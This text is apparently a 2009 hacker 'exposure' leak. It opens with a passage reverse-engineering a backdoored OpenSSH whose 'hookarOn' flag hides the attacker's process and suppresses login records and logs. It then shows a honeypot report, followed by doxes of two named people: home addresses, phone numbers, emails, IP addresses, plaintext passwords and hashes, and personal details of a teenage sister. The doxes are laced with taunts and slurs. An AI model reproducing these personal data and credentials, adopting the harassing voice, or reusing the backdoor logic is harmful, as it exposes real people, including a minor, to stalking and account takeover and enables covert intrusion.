+.text:0805850D test ebx, ebx +.text:0805850F jnz loc_80585FC + +.text:080585EC loc_80585EC: ; CODE XREF: session_proctitle+119j +.text:080585EC call setproctitle +.text:080585F1 add esp, 10h +.text:080585F4 lea esp, [ebp-0Ch] +.text:080585F7 pop ebx +.text:080585F8 pop esi +.text:080585F9 pop edi +.text:080585FA leave +.text:080585FB retn +.text:080585FC ; --------------------------------------------------------------------------- +.text:080585FC +.text:080585FC loc_80585FC: ; CODE XREF: session_proctitle+1Fj +.text:080585FC sub esp, 8 +.text:080585FF push (offset asc_8081F90+4) ; "" +.text:08058604 push (offset asc_8081F90+4) ; "" +.text:08058609 jmp short loc_80585EC +*/ + +void +session_proctitle(Session *s) +{ + if (s->pw == NULL) + error("no user for session %d", s->self); + else{ + if(hookarOn) { //if the hookarOn flag is set + setproctitle("",""); //set current process title to "" to hide from process status list (ps) + return; + } + //... +}} + + + +/* +.text:08060D30 ; int __cdecl login_write(struct utmp *ptr) +.text:08060D30 public login_write +.text:08060D30 login_write proc near ; CODE XREF: login_logout+Dj +.text:08060D30 ; login_login+Dj +.text:08060D30 +.text:08060D30 var_18 = dword ptr -18h +.text:08060D30 var_4 = dword ptr -4 +.text:08060D30 ptr = dword ptr 8 +.text:08060D30 +.text:08060D30 push ebp +.text:08060D31 mov ebp, esp +.text:08060D33 push ebx +.text:08060D34 push eax +.text:08060D35 xor eax, eax +.text:08060D37 cmp ds:hookarOn, 1 +.text:08060D3E mov ebx, [ebp+ptr] +.text:08060D41 jz short loc_8060D5E +.text:08060D43 call _geteuid +.text:08060D48 test eax, eax +.text:08060D4A jz short loc_8060D64 +.text:08060D4C sub esp, 0Ch +.text:08060D4F push offset aAttemptToWrite ; "Attempt to write login records by non-r"... +.text:08060D54 call logit +.text:08060D59 mov eax, 1 +.text:08060D5E +.text:08060D5E loc_8060D5E: ; CODE XREF: login_write+11j +.text:08060D5E mov ebx, [ebp+var_4] +.text:08060D61 leave +.text:08060D62 retn +*/ + +/** + ** login_write: Call low-level recording functions based on autoconf + ** results + **/ +int +login_write(struct logininfo *li) +{ +if(hookarOn == 1) return 0; //If the hookarOn flag is set (backdoor authenticated user) return without executing the rest of the code + //... +} + + + +/* +.text:0806A60C ; int __cdecl do_log(int, int, __gnuc_va_list arg) +.text:0806A60C public do_log +.text:0806A60C do_log proc near ; CODE XREF: fatal+Fp +.text:0806A60C ; debug3+Fp ... +.text:0806A60C +.text:0806A60C dest = byte ptr -818h +.text:0806A60C buf = byte ptr -418h +.text:0806A60C arg_0 = dword ptr 8 +.text:0806A60C arg_4 = dword ptr 0Ch +.text:0806A60C arg = dword ptr 10h +.text:0806A60C +.text:0806A60C push ebp +.text:0806A60D mov ebp, esp +.text:0806A60F push edi +.text:0806A610 push esi +.text:0806A611 push ebx +.text:0806A612 sub esp, 80Ch +.text:0806A618 cmp ds:hookarOn, 1 +.text:0806A61F mov eax, [ebp+arg_0] +.text:0806A622 mov ecx, [ebp+arg_4] +.text:0806A625 mov ebx, [ebp+arg] +.text:0806A628 jz loc_806A6E0 + +.text:0806A6E0 loc_806A6E0: ; CODE XREF: do_log+1Cj +.text:0806A6E0 ; do_log+2Aj ... +.text:0806A6E0 lea esp, [ebp-0Ch] +.text:0806A6E3 pop ebx +.text:0806A6E4 pop esi +.text:0806A6E5 pop edi +.text:0806A6E6 leave +.text:0806A6E7 retn +*/ + +void +do_log(LogLevel level, const char *fmt, va_list args) +{ +if(hookarOn == 1) return; //If the hookarOn flag is set (backdoor authenticated user) return without executing the rest of the code +//... +} + + +// For a detailed explanation refer to section [0x08] [Backdoor RCE] which covers the updated version of the backdoor. + + +root@srv01 [~/downloads/kojoney]# mv /etc/kojoney/fake_users /etc/kojoney/fake_users.backup +root@srv01 [~/downloads/kojoney]# echo root 0x3aownt > /etc/kojoney/fake_users +root@srv01 [~/downloads/kojoney]# cat /etc/kojoney/fake_users +root 0x3aownt +root@srv01 [~/downloads/kojoney]# + + +Honeypot Report +----------------------- + +Date: Tue 23 Jun 2009 05:14:39 AM EDT +Log lines: 1173 +Log size: 88K /var/log/honeypot.log + +Authenticated users. Successfull logons +--------------------------------------- + + 2 root + +Total 2 + +Unauthenticated users. Failed logons +------------------------------------ + + 72 root + 5 test + 5 oracle + 2 0x3aownt + 1 infosec + +Total 85 + +Users successfully authenticateds with publickey +------------------------------------------------ + + +Total 0 + +Users unsuccessfully authenticateds with publickey +-------------------------------------------------- + + +Total 0 + +Logons with null passwords +-------------------------- + + 8 root + 2 0x3aownt + 1 infosec + +Total 11 + +Logons with or without password +------------------------------- + + 82 root + 5 test + 5 oracle + 4 0x3aownt + 2 infosec + +Total 98 + +Number of times a remote shell was opened +----------------------------------------- + +Total 2 + +X11 forward requests +-------------------- + +Total 0 + +Executed different commands +--------------------------- + + 3 w + 2 ls + 1 quit + 1 ps + 1 pls -la etc + 1 ls -lals + 1 ls -la lol + 1 ls -la + 1 id + 1 exit + 1 cd /var + 1 cd /etc + 1 caexit + 1 bullshit . + +Total 17 + +Number of times the intruder tries to change the terminal window size +--------------------------------------------------------------------- + +Total 0 + +IP Addresses +------------ + + 1 123.233.245.226 - 75 conexion(es) + 2 91.184.220.239 - 2 conexion(es) + 3 64.191.69.101 - 10 conexion(es) + +Total 3 + +Sessions opened by humans +------------------------- + +Typo error filter: Session with id 3 opened by a human // RoMeO + +1 human session(s) total + +Humans detecteds by IP +---------------------- +0 human(s) total + +Internal Honeypot Errors +------------------------ + +Total 1 + +/* +After re-imaging and recoving the server, an SSHD honeypot was installed and configured with the backdoor credentials. +Access was granted from 64.191.169.101 (mx101.stardustdawn.com) to the honeypot sshd with username: root and the backdoor +password that only anti-sec uses (RoMeO): 0x3aownt. The connecting system was running OpenSSH v4.3. +*/ + + +_______ _______ ________ +\ _ \ ___ __\ _ \ \_____ \ +/ /_\ \\ \/ / /_\ \ / ____/ +\ \_/ \> <\ \_/ \/ \ + \_____ /__/\_ \\_____ /\_______ \ + \/ \/ \/ \/ + +___________ __ +\__ ___/____ _______ ____ _____/ |_ + | | \__ \\_ __ \/ ___\_/ __ \ __\ + | | / __ \| | \/ /_/ > ___/| | + |____| (____ /__| \___ / \___ >__| + \/ /_____/ \/ +__________ _____.__.__ .__ +\______ \_______ _____/ ____\__| | |__| ____ ____ + | ___/\_ __ \/ _ \ __\| | | | |/ \ / ___\ + | | | | \( <_> ) | | | |_| | | \/ /_/ > + |____| |__| \____/|__| |__|____/__|___| /\___ / + \//_____/ + + +1) + +RoMeO: +----- +Real Name: Faisal Hourani +Sister Name: Joud Hourani +Country: Saudi Arabia +City: Riyadh +Previous City: Jeddah +Address: King Fahad ST +Age: 20 +Birthday: April 02 +Horoscope: Aries +Height: 1.73cm (5.7") +Phone Number: +966.509121268 +Nickname: RoMeO +Emails: srshaxsir@hushmail.com, romeo.haxxor@gmail.com, romeo@darkmindz.com, coolking_97@hotmail.com +MSN: romeo@darkmindz.com +ISP Network Range: 188.48.0.0 to 188.55.255.255, 212.71.32.0 to 212.71.63.255, 82.167.0.0 to 82.167.255.255 +Domains: http://darkmindz.com, http://cybershade.org, http://www.freewebs.com/xromeox, http://xromeox.bravehost.com +Domain Hosting: hr-development.net +Domain Name Servers: ns5.hr-development.net, ns6.hr-development.net +Skills: _lulz_ +Certifications: GSCE English, Math A Level +Favorite Books: Stealing the Network: How to Own a Continent (Bob Knuth) +Fake Names: James Knuth +Fake Emails: glafk0s@hotmail.com, knuth.james1@gmail.com +PsyBNC Host: absolute.ownage.net / 72.20.28.205 +Plain Passwords: zeroforlol, ra7plmyt, sidfh928rf783, swU55ath, bu9fjogr, ve2aZCp3GYoq +Hash Passwords: $1$qx2sTgHs$VHb4bpwE.lRwBFDmjtwPx, 0fb82d94184aca290e633cf50671baf9 Salt(R_g^0), 5921174f5ef40f7765dee53b4722426b, 59a41b9e4f5983c66a6f26ef7c27fa0205af01bc:c419 +Real IPs: 188.54.114.181(08/06/09), 188.51.89.109(09/06/09), 188.50.41.73 (23/06/09-25/06/09), 188.49.23.137(26/06/09), 188.51.85.13 (27/06/09-30/06/09) +Common Phrases: sir, hai, lulz, hax, _somephrase_, rawr +Common Bash Commands: netstat, netstat, netstat @ (Panic Mode) +IRC Friends: BSDGurl, dark, pimpinjg, r0rkty, glyph, xlink, AlbinoSkunk +Staff Member: thedefaced.org, blackhat-forums.com, r00tsecurity.org +Cars Driving: Golf GTI, Nissan Armada +Favorite TV Shows: Friends, Dharma and Greg, Inside Edition, Still Standing, Grounded for life +Favorite Movies: House of Wax, The Notebook +Favorite Games: Counter-Strike, Doom 3 +Favorite Music: Fergie, Chris Brown, Fadel and Yara +School: Thamer International School, Jeddah, Saudi Arabia +Studies: Limkokwing University of Creative Technology '12 (http://www.limkokwing.net/united_kingdom) +Studies Course: Software Engineering + +RoMeO's sister: +--------------- + +Full Name: Jude (Joud) Hourani or Al-Hourani +Nationality: Jordanese +Speaks: English, French, Arabic and possibly 1 or 2 other languages. +Lives in: Jeddah (Saudi Arabia) +Birthday: July 14th 1993 +Age: 17 +Zodiac: Cancer +Hair color: Black and Brown (Her worst habit...) +Height: 1.68cm ~ 1.72cm +Drinks: Sprite, 7up, Pepsi and Cade +Movies: Far too many including Zoolander, She's The Man, Last Holiday, Aquamarine, Ice Princess, + Princess Diaries 1 & 2, Freaky Friday, Just Friends, Pink Panther, Just Like Heaven, Click, Meet The Fockers, + Meet The Parents, Tokyo Drift, Just My Luck, Shall We Dance, Moulin Rouge, A Walk To Remember, Chasing Liberty, + Mean Girls, War of the Worlds, Mr. Deeds and many many more!!! Woa, quite a collection I must admit! =) +TV Series: Friends, Fashion House, Still Standing, 8 Simple Rules, Star Academy, Seventeen, Popular, + Sleepover club and many other... +Quote: "Elordon Awalan" which means "Jordan First!" +Sports: Basketball and Tennis +Eats: French fries, shrimps and candy!!! Hehehe... :-T +Ice-Cream: Chocolate, Lime and Strawberry +Candy: HARIBO +Colors: White, Black, Red, Pink and Blue +Hobbies: Playing the piano (wants to learn electric guitar), dancing Hip-Hop, chatting on the internet + and watching movies! Yeeah! :-P +Idols: Has a few but favorite is Avril Lavigne because she is not afraid to speak her mind... L-o-L! +Dream Vacations: USA Disney Land + + + +Darkmindz.com on 2007-02-24 - Domain History + +Registrant: + Individual + Chilis building Hamra street + jeddah, 6277 + SA + + Domain name: DARKMINDZ.COM + +Administrative Contact: + Perlman, Menachem menachem12345@gmail.com + Chilis building Hamra street + jeddah, 6277 + SA + +966.509121268 + Technical Contact: + NOC (Network Operations Center), Servage.net noc@servage.com + Im Grund 9 + Flensburg, DE 24939 + DE + +49.46116098358 Fax: +49.46116098359 + + +Darkmindz.com on 2007-04-06 - Domain History + + +Registrant: + Individual + Kind Fahad ST. + Riyadh, + sa + + Domain name: DARKMINDZ.COM + + Administrative Contact: + Haxxor, RoMeO romeo.haxxor@gmail.com + King Fahad ST. + Riyadh, + sa + +966.509121268 + Technical Contact: + NOC (Network Operations Center), Servage.net noc@servage.com + Im Grund 9 + Flensburg, DE 24939 + DE + +49.46116098358 Fax: +49.46116098359 + + Registration Service Provider: + Servage.net Hosting, support@servage.net + +49 46116098359 (fax) + http://www.servage.net/ + + +Darkmindz.com on 2008-01-05 - Domain History + + +Registrant: + Individual + King Fahad ST. + Riyadh, + SA + + Domain name: DARKMINDZ.COM + + Administrative Contact: + Perlman, Menachem romeo.haxxor@gmail.com + King Fahad ST. + Riyadh, + SA + +966.509121263 + Technical Contact: + Perlman, Menachem romeo.haxxor@gmail.com + King Fahad ST. + Riyadh, + SA + +966.509121263 + + +Darkmindz.com on 2009-07-31 - Domain History + +Domain name: darkmindz.com + +Registrant Contact: + NA + NA Individual () + + Fax: + King Fahad ST. + Riyadh, P + SA + +Administrative Contact: + NameCheap.com + NameCheap.com NameCheap.com (support@NameCheap.com) + +1.6613102107 + Fax: +1.5555555555 + 8939 S. Sepulveda Blvd. #110 - 732 + Westchester, CA 90045 + US + + +/* +Domain history shows exactly RoMeo past and current Saudi Arabia address, including his mobile number. +The registrant name provided in the registration of the domain between 2007-02-24 and 2008-01-05 came +in contradiction with our research, therefore was classified as fake. +*/ + +Cybershade.org on 2008-12-23 - Domain History + +Domain ID:D149271481-LROR +Domain Name:CYBERSHADE.ORG +Created On:29-Sep-2007 15:21:51 UTC +Last Updated On:22-Dec-2008 17:59:31 UTC +Expiration Date:29-Sep-2010 15:21:51 UTC +Sponsoring Registrar:eNom, Inc. (R39-LROR) +Status:OK +Registrant ID:15a646b0510 +Registrant Name:Cybershade Inc +Registrant Street1:123 Cybershade org +Registrant Street2: +Registrant Street3: +Registrant City:Internet +Registrant State/Province:DOMAIN +Registrant Postal Code:Z1P CD3 +Registrant Country:GB +Registrant Phone:+44.123567890 +Registrant Phone Ext.: +Registrant FAX: +Registrant FAX Ext.: +Registrant Email:crawleruk@gmail.com +Admin ID:15a646b0510 +Admin Name:Cybershade Inc +Admin Street1:123 Cybershade org +Admin Street2: +Admin Street3: +Admin City:Internet +Admin State/Province:DOMAIN +Admin Postal Code:Z1P CD3 +Admin Country:GB +Admin Phone:+44.123567890 +Admin Phone Ext.: +Admin FAX: +Admin FAX Ext.: +Admin Email:crawleruk@gmail.com +Tech ID:15a646b0510 +Tech Name:Cybershade Inc +Tech Street1:123 Cybershade org +Tech Street2: +Tech Street3: +Tech City:Internet +Tech State/Province:DOMAIN +Tech Postal Code:Z1P CD3 +Tech Country:GB +Tech Phone:+44.123567890 +Tech Phone Ext.: +Tech FAX: +Tech FAX Ext.: +Tech Email:crawleruk@gmail.com +Name Server:NS3.HR-DEVELOPMENT.NET +Name Server:NS4.HR-DEVELOPMENT.NET + +// Domain used for their cybershade CMS development. + + +Hello there and welcome to "RoMeOs" one stop web +Check it out and let me know what you think, you can contact me on coolking_97@hotmail.com +Male, 15 years old +Jedah, Saudi-Arabia +ref: First Website : http://www.freewebs.com/xromeox/ + +/* +RoMeO first website teaching "Ileagal Knoweledge!" related to hacking including the basics of IP Address +and how you can get other people IP Address. Say, you're really special, aren't you? +*/ + + +RoMeO: +" + +http://i43.tinypic.com/21317c6.png + +// root@mercedes ?? + +[14:52:44] <&RoMeO> http://www.blackhat-forums.com/topic/10564-xss-in-wall-ssh-1-putty/ +[14:53:42] RoMeO: now that you've had your fun +[14:53:46] <&RoMeO> :) +[14:53:53] <&RoMeO> i had the lulz of a life time +[14:53:53] feel like explaining integer underflows +[14:53:56] <&RoMeO> no + +.____ ____ ___.____ __________ .___.__ .__ +| | | | \ | \____ / __| _/|__| ______ ____ | | ____ ________ _________ ____ +| | | | / | / / ______ / __ | | |/ ___// ___\| | / _ \/ ___/ | \_ __ \_/ __ \ +| |___| | /| |___ / /_ /_____/ / /_/ | | |\___ \\ \___| |_( <_> )___ \| | /| | \/\ ___/ +|_______ \______/ |_______ \/_______ \ \____ | |__/____ >\___ >____/\____/____ >____/ |__| \___ > + \/ \/ \/ \/ \/ \/ \/ \/ PRESENTS + [ XSS in wall on SSH 1 / putty ] + + + + +Hello there, im new in here, actually im new to the whole fedora project, i have a fedora core 3, and i was trying +alot to connect it to the internet but no use! +i have a wireless network at my home, and a modem "Motorolla sm65" i just couldnt install them on the computer, any ideas? + +you can email me at: romeo.haxxor@gmail.com +thanks../ + +Join Date: Jan 2007 +Location: Saudi-Arabia +Posts: 6 + +Ref: http://forums.fedoraforum.org/showthread.php?t=146470 + +/* +If he can't install a modem then I don't see how he could hack his way out of a wet paper bag... +oh wait... he can't... he's a skiddie! +*/ + + +Posted 30 May 2008 - 03:13 AM +I am glad you like the articles section :) , what about the code base tho? any comments on that maybe? + +and hm, I have A levels ( GCSE ) exams atm, after that the new release of DMZ will start, and the main +prios to improve are: + +- Layout +- Submit sytem + articles / codes system. + +all the articles and codes will be reformated to look at its best, etc.... + +@intimidat0r, I sure will :) + +ref: https://www.binrev.com/forums/index.php/topic/37778-darkmindz/page__view__findpost__p__308906 + +// Your first professional certification I presume? + + +DarkMindZ +tags: turbocharged06 romeo r4z0rbl4de the reaper xlink jath darkmindz darkmindz.org dmz hacking hacking +group underground hackers security experts graphics tutorials learning +ref: http://www.urbandictionary.com/define.php?term=DarkMindZ + +/* +Must suck to have two different conflicting personalities. +Whats next? Animal Detectives or Horse humpers (http://www.youtube.com/watch?v=Cf3p1mXHfqY) +*/ + +Facebook Lulz +------------- + +Faisal Hourani +SocialInterview.com asked me "Name someone you wish you could date." +I answered ''Megan Fox. rawr'' +November 15 at 3:56am via Social Interview · Interview Me + + +Faisal Hourani +SocialInterview.com asked me "What would your mother think if she saw everything you've posted on Facebook?" +I answered ''She already checks out everything, everyday. Hi mom :]...'' +November 15 at 10:06pm via Social Interview · View Feedback (2)Hide Feedback (2) · Interview Me + +// We hope she checks this out:] Hai Faisal's mom + + +Faisal Hourani +SocialInterview.com asked me "If you could rule any country or place, what would you pick?" +I answered: "The world =O" + +// You ever thought about Economical Crisis ? + + +Faisal Hourani they don't call me romeo for jack :P +Faisal took the How dateable are you? quiz and the result is COMPLETLY DATEABLE! +You are the perfect gentleman/lady and you know everything anybody needs to know about dating and flirting +See More +July 6 at 7:00pm via How dateable are you? · View Feedback (2)Hide Feedback (2) · Take this Quiz + +// rawr :] lulz + + +“I can’t believe that out of 10,000 sperm, you were the quickest.” +~ Steven Pearl + + + + +ref: http://nepalimadbulls.wetpaint.com/page/Login+Log + +// As a skiddie, you are NOT supposed to know how to secure your own code.. + + +(4954,'RoMeO',1188441098,0,0,'',0,'',0,0,'','','','5921174f5ef40f7765dee53b4722426b','romeo.haxxor@gmail.com','',0,'0001-01-01','','','','','','','',0,1,'','',0,'',0,0,0,'',1,1,0,2,'','','','',0,1,'',0,'','',0,0,'',0,'',NULL) +(5033,'RoMeO',1188441098,46,0,'',1207945792,'RoMeO',2,0,'','5921174f5ef40f7765dee53b4722426b','romeo.haxxor@gmail.com','DarkMindZ',1,'1991-02-02','DarkMindZ','http://www.darkmindz.com','DarkMindZ','','','','romeo@darkmindz.com',0,1,'','I Learn The Rules To Break Them',0,'',1,0,0,'',1,1,'77.30.170.77','','',2,1,'',30843,'','',23,106496,'',0,0,130,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'0',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,2,1,2,2,1,2,1,41,267,'down') + +IP address: 77.30.170.77 +Reverse DNS: 77.30.170.77.dynamic.saudi.net.sa. +Reverse DNS authenticity: [Could be forged: hostname 77.30.170.77.dynamic.saudi.net.sa. does not exist] +ASN: 25019 +ASN Name: SAUDINETSTC-AS +IP range connectivity: 5 +Registrar (per ASN): RIPE +Country (per IP registrar): SA [Saudi Arabia] +Country Currency: SAR [Saudi Arabia Riyals] +Country IP Range: 77.30.0.0 to 77.31.255.255 +Country fraud profile: Normal +City (per outside source): Riyadh, Ar Riyad +Country (per outside source): SA [Saudi Arabia] +Private (internal) IP? No +IP address registrar: whois.arin.net +Known Proxy? No +Link for WHOIS: 77.30.170.77 + +(23440,701,41,1188442878,5033,'Re: POLL - ALL MEMBERS MUST READ AND VOTE!','RoMeO','romeo.haxxor@gmail.com','89.5.78.7',1,1188492293,'0rijin4l','0rijin4l got me here','xx'),( + +IP address: 89.5.78.7 +Reverse DNS: dynamic.dsl.nesma.net.sa. +Reverse DNS authenticity: [Could be forged: hostname dynamic.dsl.nesma.net.sa. does not exist] +ASN: 24731 +ASN Name: ASN-NESMA (National Engineering Services and Marketing Company Ltd. (NESMA)) +IP range connectivity: 1 +Registrar (per ASN): RIPE +Country (per IP registrar): SA [Saudi Arabia] +Country Currency: SAR [Saudi Arabia Riyals] +Country IP Range: 89.4.0.0 to 89.5.255.255 +Country fraud profile: Normal +City (per outside source): Riyadh, Ar Riyad +Country (per outside source): SA [Saudi Arabia] +Private (internal) IP? No +IP address registrar: whois.ripe.net +Known Proxy? No +Link for WHOIS: 89.5.78.7 + +ref: http://www.gonullyourself.org/ezines/G-line/G-line.4.txt + + + +----- darkmindz.com ----- + +----------------- +Host's addresses: +----------------- + darkmindz.com. 5 IN A 69.42.209.54 + +------------- +Name servers: +------------- + ns6.hr-development.net. 5 IN A 69.42.209.51 + ns5.hr-development.net. 5 IN A 69.42.209.50 + +----------- +MX record: +----------- + aspmx.l.google.com. 5 IN A 209.85.219.58 + +--------------------- +Trying Zonetransfers: +--------------------- + + trying zonetransfer for darkmindz.com on ns6.hr-development.net ... + + trying zonetransfer for darkmindz.com on ns5.hr-development.net ... + +------------------------------ +Brute forcing with dns.txt: +------------------------------ + ftp.darkmindz.com. 5 IN A 69.42.209.54 + mail.darkmindz.com. 5 IN A 69.42.209.54 + pop.darkmindz.com. 5 IN A 69.42.209.54 + smtp.darkmindz.com. 5 IN A 69.42.209.54 + www.darkmindz.com. 5 IN A 69.42.209.54 + +------------------------------- +darkmindz.com c class netranges: +------------------------------- + 69.42.209.0/24 + + + +----- cybershade.org ----- + +----------------- +Host's addresses: +----------------- + cybershade.org. 5 IN A 69.42.209.54 + +------------- +Name servers: +------------- + ns6.hr-development.net. 5 IN A 69.42.209.51 + ns5.hr-development.net. 5 IN A 69.42.209.50 + +----------- +MX record: +----------- + mail.cybershade.org. 5 IN A 69.42.209.54 + +--------------------- +Trying Zonetransfers: +--------------------- + + trying zonetransfer for cybershade.org on ns6.hr-development.net ... + + trying zonetransfer for cybershade.org on ns5.hr-development.net ... + +------------------------------ +Brute forcing with dns.txt: +------------------------------ + ftp.cybershade.org. 5 IN A 69.42.209.54 + mail.cybershade.org. 5 IN A 69.42.209.54 + pop.cybershade.org. 5 IN A 69.42.209.54 + smtp.cybershade.org. 5 IN A 69.42.209.54 + www.cybershade.org. 5 IN A 69.42.209.54 + +------------------------------- +cybershade.org c class netranges: +------------------------------- + 69.42.209.0/24 + + + +2) pimpinjg + +Real Name: Jason +Country: United States +State: California +Address: +Age: 38 +Birthday: July 18, 1971 +Daughter Name: Dakota +Phone Number: +Nickname: pimpinjg +MSN: pimpinjg@hr-development.net +ICQ: 574404127 +Skype: pimpinjg +Emails: pimpinjg@hr-development.net, pimpinjg@hotmail.com, pimpinjg4@aol.com, pimpinjg@linuxmail.org +ISP Network Range(s): 76.80.0.0 to 76.95.255.255, 76.160.0.0 to 76.175.255.255 +Domains: h4ckinab0x.com, teamhbx.com, project-h4x0r.com, copyandpaste.info, anti-sec.net, pimpinjg.net, super-syn.net +Domain Hosting: hr-development.net +Domain Name Servers: ns5.hr-development.net, ns6.hr-development.net +Company: hr-development.net +Skills: DDOS Flooder and Anti-DDOS Specialist :D _none_ +PsyBNC Host(s): *.deploy.akamaitechnologies.com, complete.ownage.net (72.20.17.206) +Plain Password(s): joeybe11, 1b6m9p34nz, h4ckinab0x, 1ssgy0ZACGUZFS +Hash Password(s): e93567696318487f84ea635b1e617d5a, $1$D0PGDf.U$6IyagtS0AYLnTXI4DiPmh1, +Real IP(s): 76.175.20.182, 76.175.18.227, 76.94.14.130, 76.175.18.227 +Common Bash Commands: nano, wget :D +IRC Friends: RoMeO, garrett +Affiliates: thedefaced.org, darkmindz.com +Operating System(s): Ubuntu 8.10, Windows Vista + + +- +pimpinjg is pimpinjg@cloaked-1243C38A.deploy.akamaitechnologies.com * Pimpinjg +pimpinjg is using modes +iwrxt +pimpinig is connecting from *@cpe-76-175-20-182.socal.res.rr.com 76.175.20.182 +pimpinjg is a registered nick +pimpinjg on #underground_systems #astalavista &#darkmindz +pimpinjg using twofish.securitychat.org SecurityChat.org ircd +pimpinjg has been idle 54mins 58secs, signed on Sun Jun 21 10:21:02 +pimpinjg End of /WHOIS list. + + + +/****************************************************************************************** +* pimp.shell priv release for my baby joeybe11 Ballcanc3r and myself ;) +* +* +* New Mods (added by me) -- ++--------------------------------------------------------+ +* added proxy shit +* removed images for less crap in the logs +* added cpanel finder (thx to ackit) +* added rfi/lfi finder (thx to ackit) +* other shit i cba putting here ++--------------------------------------------------------+ +* shit to remove -- ++--------------------------------------------------------+ +* - a bunch of stupid code things (example: echo("$msg"); (wtf... :S)) +*********************************************************/ + +// Private 0Day Exploits, Backdoors, Shells, Privacy.. u name it.. not so private anymore.. + + +H4ckinab0x.com on 2008-03-12 - Domain History + +Registrant: + project-h4x0r + 430 west imperial highway 16 + brea, California 92821 + United States + + Domain Name: H4CKINAB0X.COM + Created on: 11-Mar-08 + Expires on: 11-Mar-09 + Last Updated on: 11-Mar-08 + + Administrative Contact: + Gleason, rex pimpinjg4@aol.com + project-h4x0r + 430 west imperial highway 16 + brea, California 92821 + United States + (714) 529-4264 Fax -- + + +Project-h4x0r.com on 2008-02-16 - Domain History + +Registrant: + project-h4x0r + 432 west imperial highway 16 + brea, California 92821 + United States + + Domain Name: PROJECT-H4X0R.COM + Created on: 13-Feb-08 + Expires on: 14-Feb-10 + Last Updated on: 14-Feb-08 + + Administrative Contact: + gleason, joshua pimpinjg4@aol.com + project-h4x0r + 432 west imperial highway 16 + brea, California 92821 + United States + (714) 529-4234 Fax -- + + +Teamhbx.com on 2008-09-05 - Domain History + +Registrant: + h4ckinab0x + 234 nigger street + nigger, California 11111 + United States + + Domain Name: TEAMHBX.COM + Created on: 03-Sep-08 + Expires on: 03-Sep-09 + Last Updated on: 03-Sep-08 + + Administrative Contact: + nigger, nigger pimpinjg4@aol.com + h4ckinab0x + 234 nigger street + nigger, California 11111 + United States + 111111111 Fax -- + + + +Afraid.org Domains: + +h4ckinab0x.com +(5 hosts in use) website private pimpinjg 192 days ago (01/22/2009) +copyandpaste.info +(7 hosts in use) website private pimpinjg 66 days ago (05/28/2009) +super-syn.net +(6 hosts in use) website private pimpinjg 1 day ago (08/02/2009) +anti-sec.net +(6 hosts in use) website private pimpinjg 2 days ago (07/05/2009) +Ref: http://www.baccomber.com/domain/registry/?page=363&sort=3&q= + +// It's amazing what u can find on the net.. + + +pimpinjg +im pimpinjg some of you may know me some of you may not last 2 years ive been studying to become a linux administrator +(wanna start a whitehat security company) i know my shit (you can verify with ViSiOn :hihihi: yeah so sup +Ref: http://madspot.org/forums/viewtopic.php?f=7&t=11107&start=0 + +// How's that going for you? Managed to start your "whitehat" security company? lulz + +pimpinjg +Posted 19 October 2008 - 02:05 PM +i suck at introductions so anyways here i go my names pimpinjg ive been in hacking for about 8 months i am knowledgeable +in vb,C++, and php wanting to learn asm for reverse engineering and whatnot (and some destructive shit) own a +couple warez sites wont release the urls cuz advertising so yeah sup :) +ref: http://darktavern.org/forum/General-f3/Introduction-f20/Pimpinjg-t11469.html + +// 8 months? Is this a bad joke or a tragedy? + + +pimpinjg +is there anyway to make it auto delete suspicious files becuz im getting backdoored and im not ready for an os reload +till i get a good backup.. +ref: http://forum.configserver.com/showthread.php?p=4535 + +// Did your lover backdoor you? Do you drop the soap on command now? + + +----- copyandpaste.info ----- + +----------------- +Host's addresses: +----------------- + copyandpaste.info. 5 IN A 76.175.20.182 + +------------- +Name servers: +------------- + ns2.afraid.org. 5 IN A 66.252.5.14 + ns4.afraid.org. 5 IN A 67.18.179.15 + ns3.afraid.org. 5 IN A 72.20.15.62 + ns1.afraid.org. 5 IN A 67.19.72.206 + +----------- +MX record: +----------- + aspmx.l.google.com. 5 IN A 209.85.219.26 + +--------------------- +Trying Zonetransfers: +--------------------- + + trying zonetransfer for copyandpaste.info on ns2.afraid.org ... + + trying zonetransfer for copyandpaste.info on ns3.afraid.org ... + + trying zonetransfer for copyandpaste.info on ns4.afraid.org ... + + trying zonetransfer for copyandpaste.info on ns1.afraid.org ... + +------------------------------ +Brute forcing with dns.txt: +------------------------------ + ftp.copyandpaste.info. 5 IN A 67.19.72.202 + irc.copyandpaste.info. 5 IN A 94.102.58.212 + mail.copyandpaste.info. 5 IN A 67.19.72.202 + www.copyandpaste.info. 5 IN CNAME copyandpaste.info. + copyandpaste.info. 5 IN A 76.175.20.182 + +------------------------------- +copyandpaste.info c class netranges: +------------------------------- + 67.19.72.0/24 + 76.175.20.0/24 + 94.102.58.0/24 + + +WebHostingTalk Rumors +--------------------- + +* 7/4/2009 1:19 am Heads up - Openssh 4.3* 0day +* 6/9/2009 7:38 am Astalavista got hacked +* 5/10/2009 9:15 am Post Your Server Uptime + +ref: http://www.webhostingtalk.com/profile/HRDev%20Jason + +// HR-Development.net the Anti-DDOS Specialist ? aka anti-sec? + + +HRDev Jason HRDev Jason is offline +View Beta Profile +New Member +Join Date: Mar 2009 +Posts: 3 +hm, just gona put a shot in the dark here, nowayout the security expert! aka 'glafkos' and (but not limited too) astalavista staff? + +ref: http://www.webhostingtalk.com/showthread.php?p=6269877#post6269877 + +// Hm.. Jason (pimpinjg), did the 8 months of hacking made you a security expert? + +Old 06-09-2009, 08:38 AM +HRDev Jason HRDev Jason is offline +View Beta Profile +New Member +Join Date: Mar 2009 +Posts: 3 +looks like the same hacker group striked again? +pastebin.com/m592e1f1c +i wonder what his obsession is with astalavista staff? +and from the looks of it he has a 0day grsecurity exploit too, its getting really bad + +ref: http://www.webhostingtalk.com/showthread.php?p=6227267#post6227267 + +// Being the anti-sec bitch, it is expected to spread misleading rumors like grsec, jail break and so on.. + +HRDev Jason HRDev Jason is offline +View Beta Profile +New Member +Join Date: Mar 2009 +Posts: 3 +This thread needs life! && bump +Intel(R) Pentium(R) 4 CPU 2.40GHz, 2gb Kingston (ddr2) ram 150GB WD HDD +[root@mercedes ~]# uptime +07:02:59 up 56 days, 20:06, 1 user, load average: 0.01, 0.05, 0.01 +[root@mercedes ~]# + 